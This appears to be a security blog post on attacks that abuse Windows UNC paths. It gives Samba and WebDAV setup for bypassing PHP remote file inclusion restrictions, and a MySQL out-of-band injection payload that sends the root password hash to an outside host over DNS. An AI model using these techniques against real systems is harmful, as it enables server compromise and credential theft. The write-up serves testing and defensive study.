The Microsoft Windows UNC

The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:

\\ComputerName\SharedFolder\Resource

Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. The UNC syntax is extended with optional components to denote use of SSL and TCP/IP port number, a WebDAV URL of http[s]://HostName[:Port]/SharedFolder/Resource becomes:

\\HostName[@SSL][@Port]\SharedFolder\Resource

Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction

Overview

Via. http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

A few days ago, there’s an article on Twitter about exploiting remote file inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction. This is a perfect trick.

In PHP Configuration file, allow_url_include wrapper by-default set to “Off” which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if “allow_url_include” and “allow_url_fopen” both are set to “Off”.

This trick exploits Windows UNC’s characteristics. Attack chain: UNC->SMB->DATA.

In addition to SMB, you can also use unauthorized WebDAV.

SMB

Configuring the Samba Server with anonymous read access (Linux Machine).

In Kali Linux, install the Samba using the following commands:

apt-get install samba

Create SMB share directory:

mkdir /var/www/html/pub/

Configure permissions on newly created SMB share directory:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

Run below mentioned command to remove default content of SAMBA server config file:

echo > /etc/samba/smb.conf

Put below mentioned content in file /etc/samba/smb.conf:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Now, restart Samba Server to apply new configuration spcified in config file /etc/samba/smb.conf :

service smbd restart

Once SAMBA server has been restarted successfully, try to access SMB share and make sure SAMBA server is not asking for credentials:

\\192.168.0.111\ethan\filename

WebDAV

Start a WebDAV service with Docker:

Use https://github.com/BytemarkHosting/docker-webdav. Just put the result file in /root/WebDAV/data, but username and password are necessary. :(

docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav

Use https://github.com/idelsink/webdav-docker.

docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav

The WebDAV client of Windows relies on the Webclient Service (Default opening). If you want to access the WebDAV Service through UNC, you have to start the service first.

Notice: The webclient of windows will change the path of requesting WebDAV to uppercase, while Apache defaults to case-sensitive when matching paths. It discovered by log file. The uppercase path is blocked directly and returned to 403.

You can use pure digital paths and file names to solve this problem.

Vul2: MySQL OOB Injection

Overview

Via. https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking

Out-of-band injection involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.

From the Payloads provided by CEYE, it can be seen that OOB injection is very well researched in MSSQL and Oracle. But in MySQL and PostgreSQL, it is limited. The payload provided by CEYE for MySQL is:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

You can see that there are a lot of backslashes \.

Notice: This also exploits Windows UNC’s characteristics.

Limitations

This option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. Refer to the link: https://dev.mysql.com/doc/refman/5.7/en/server-options.html

Property Value
Command-Line Format --secure-file-priv=dir_name
System Variable secure_file_priv
Scope Global
Dynamic No
Type String
Default Value (>= 5.7.6) platform specific
Default Value (<= 5.7.5) empty string
Valid Values (>= 5.7.6) empty string, dirname, NULL
Valid Values (<= 5.7.5) empty string, dirname